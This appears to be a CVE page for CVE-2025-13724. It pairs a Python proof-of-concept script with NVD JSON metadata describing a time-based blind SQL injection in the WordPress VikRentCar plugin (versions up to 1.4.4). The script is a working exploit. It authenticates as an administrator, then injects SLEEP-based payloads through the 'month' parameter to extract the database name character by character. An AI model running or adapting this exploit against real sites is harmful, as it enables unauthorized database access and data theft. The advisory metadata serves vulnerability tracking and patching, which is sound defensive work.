CVE-2025-13724

import requests import time # CVE-2025-13724 PoC - Time-based Blind SQL Injection # Target: WordPress VikRentCar plugin (<= 1.4.4) # Parameter: month target_url = "http://target-site.com/wp-admin/admin.php" # Login with admin credentials to obtain session cookie session = requests.Session() def login(wordpress_url, username, password): """Authenticate to WordPress admin panel""" login_url = f"{wordpress_url}/wp-login.php" data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{wordpress_url}/wp-admin/" } response = session.post(login_url, data=data) return 'wordpress_logged_in' in session.cookies.get_dict() def extract_data_via_blind_sql(wordpress_url): """Extract database name using time-based blind SQL injection""" # Construct malicious month parameter # Database name length detection length_payload = "1 AND IF(LENGTH(DATABASE())={length},SLEEP(5),0)---" # Character extraction payload char_payload = "1 AND IF(SUBSTRING(DATABASE(),{pos},1)='{char}',SLEEP(5),0)---" db_name = "" for pos in range(1, 20): # Max length check for char in 'abcdefghijklmnopqrstuvwxyz0123456789_': payload = char_payload.format(pos=pos, char=char) params = {'page': 'vikrentcar', 'option': 'com_vikrentcar', 'task': 'overv', 'month': payload} start_time = time.time() response = session.get(wordpress_url + "/wp-admin/admin.php", params=params) elapsed = time.time() - start_time if elapsed >= 5: db_name += char print(f"[*] Extracted character: {char} | Current DB name: {db_name}") break else: break # No more characters print(f"[+] Database name: {db_name}") return db_name # Usage example # login("http://target-site.com", "admin", "password") # extract_data_via_blind_sql("http://target-site.com")

{"cve": {"id": "CVE-2025-13724", "sourceIdentifier": "[email protected]", "published": "2025-12-02T09:15:47.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'month' parameter in all versions up to, and including, 1.4.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/vikrentcar/tags/1.4.4/admin/views/overv/view.html.php#L195", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/vikrentcar/trunk/admin/views/overv/view.html.php#L195", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3403439%40vikrentcar&new=3403439%40vikrentcar&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/724a2da0-e4e7-4868-a1ad-fce69a915981?source=cve", "source": "[email protected]"}]}}